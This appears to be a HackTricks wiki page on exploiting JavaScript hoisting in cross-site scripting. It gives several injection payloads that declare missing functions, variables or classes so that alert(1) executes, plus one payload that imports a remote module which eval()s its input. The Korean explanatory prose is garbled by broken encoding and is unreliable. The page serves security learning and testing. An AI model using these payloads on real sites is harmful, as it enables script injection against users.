# JS Hoisting
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Basic Information
JavaScript μΈμ΄μμ **Hoisting**μΌλ‘ μλ €μ§ λ©μ»€λμ¦μ λ³μ, ν¨μ, ν΄λμ€ λλ μν¬νΈμ μ μΈμ΄ μ½λκ° μ€νλκΈ° μ μ κ°λ
μ μΌλ‘ κ·Έ λ²μμ 맨 μλ‘ μ¬λΌκ°λ κ³Όμ μ μ€λͺ
ν©λλ€. μ΄ κ³Όμ μ JavaScript μμ§μ μν΄ μλμΌλ‘ μνλλ©°, μ€ν¬λ¦½νΈλ₯Ό μ¬λ¬ λ² ν΅κ³Όνλ©΄μ μ§νλ©λλ€.
첫 λ²μ§Έ ν΅κ³Ό λμ, μμ§μ μ½λλ₯Ό ꡬ문 μ€λ₯λ₯Ό νμΈνκΈ° μν΄ νμ±νκ³ μ΄λ₯Ό μΆμ ꡬ문 νΈλ¦¬λ‘ λ³νν©λλ€. μ΄ λ¨κ³μλ νΉμ μ μΈμ΄ μ€ν 컨ν
μ€νΈμ 맨 μλ‘ μ΄λνλ hoistingμ΄ ν¬ν¨λ©λλ€. νμ± λ¨κ³κ° μ±κ³΅μ μΌλ‘ μλ£λλ©΄, μ¦ κ΅¬λ¬Έ μ€λ₯κ° μμμ λνλ΄λ©΄, μ€ν¬λ¦½νΈ μ€νμ΄ μ§νλ©λλ€.
μ΄ν΄ν΄μΌ ν μ€μν μ μ:
1. μ€ν¬λ¦½νΈλ μ€νμ΄ λ°μνκΈ° μν΄ κ΅¬λ¬Έ μ€λ₯κ° μμ΄μΌ ν©λλ€. ꡬ문 κ·μΉμ μ격νκ² μ€μλμ΄μΌ ν©λλ€.
2. μ€ν¬λ¦½νΈ λ΄ μ½λμ λ°°μΉκ° hoistingμΌλ‘ μΈν΄ μ€νμ μν₯μ λ―ΈμΉμ§λ§, μ€νλ μ½λλ ν
μ€νΈ ννκ³Ό λ€λ₯Ό μ μμ΅λλ€.
#### Types of Hoisting
MDNμ μ 보μ λ°λ₯΄λ©΄, JavaScriptμλ λ€ κ°μ§ λλ ·ν μ νμ hoistingμ΄ μμ΅λλ€:
1. **Value Hoisting**: λ³μμ μ μΈ λΌμΈ μ΄μ μ ν΄λΉ λ³μμ κ°μ μ¬μ©ν μ μκ² ν©λλ€.
2. **Declaration Hoisting**: λ³μμ μ μΈ μ΄μ μ ν΄λΉ λ³μλ₯Ό μ°Έμ‘°ν μ μκ² νλ©°, μ΄λ‘ μΈν΄ `ReferenceError`κ° λ°μνμ§ μμ§λ§, λ³μμ κ°μ `undefined`κ° λ©λλ€.
3. μ΄ μ νμ μ€μ μ μΈ λΌμΈ μ΄μ μ λ³μμ μ μΈμΌλ‘ μΈν΄ λ²μ λ΄ λμμ λ³κ²½ν©λλ€.
4. μ μΈμ λΆμμ©μ κ·Έκ²μ ν¬ν¨νλ λλ¨Έμ§ μ½λκ° νκ°λκΈ° μ μ λ°μν©λλ€.
μμΈν μ€λͺ
νμλ©΄, ν¨μ μ μΈμ μ ν 1 hoisting λμμ λνλ
λλ€. `var` ν€μλλ μ ν 2 λμμ 보μ¬μ€λλ€. `let`, `const`, λ° `class`λ₯Ό ν¬ν¨νλ λ μ컬 μ μΈμ μ ν 3 λμμ λνλ
λλ€. λ§μ§λ§μΌλ‘, `import` λ¬Έμ μ ν 1 λ° μ ν 4 λμμΌλ‘ hoistedλλ λ
νΉν νΉμ±μ κ°μ§κ³ μμ΅λλ€.
## Scenarios
λ°λΌμ **μ μΈλμ§ μμ κ°μ²΄**κ° μ¬μ©λ νμ **JS μ½λλ₯Ό μ£Όμ
ν μ μλ μλ리μ€**κ° μλ€λ©΄, μ΄λ₯Ό μ μΈνμ¬ **ꡬ문μ μμ **ν μ μμ΅λλ€(κ·Έλμ μ€λ₯λ₯Ό λ°μμν€λ λμ μ½λκ° μ€νλ©λλ€):
```javascript
// The function vulnerableFunction is not defined
vulnerableFunction('test', '');
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
```
```javascript
// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
return 1
};
myFunction(a, '')
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);
```
```javascript
// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
return 1;
}
alert(1);
```
```javascript
// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesnΒ΄t exist
// cannot be fixed if you can only inject after that code:
test.cookie('leo','INJECTION')
test['cookie','injection']
```
## λ λ§μ μλ리μ€
```javascript
// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
// You can inject
alert(1));function x(){}//
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
x.y(1,alert(1));function x(){}//)
```
```javascript
// Undeclared var accessing 2 nested undeclared method
x.y.z(1,INJECTION)
// You can inject
");import {x} from "https://example.com/module.js"//
// It will be executed
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
// The imported module:
// module.js
var x = {
y: {
z: function(param) {
eval(param);
}
}
};
export { x };
```
```javascript
// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
// It was injected the: let config;`-alert(1)`//`
// With the goal of making in the block the var config be empty, so the return is not executed
// And the same injection was replicated in the body URL to execute an alert
try {
if(config){
return;
}
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config;`-alert(1)`//`+"
} catch {
fetch("/error", {
method: "POST",
body: {
url:"https://try-to-catch.glitch.me/"+`
let config;`-alert(1)-`//`+""
}
})
}
```
## References
* [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
* [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
* [https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/](https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}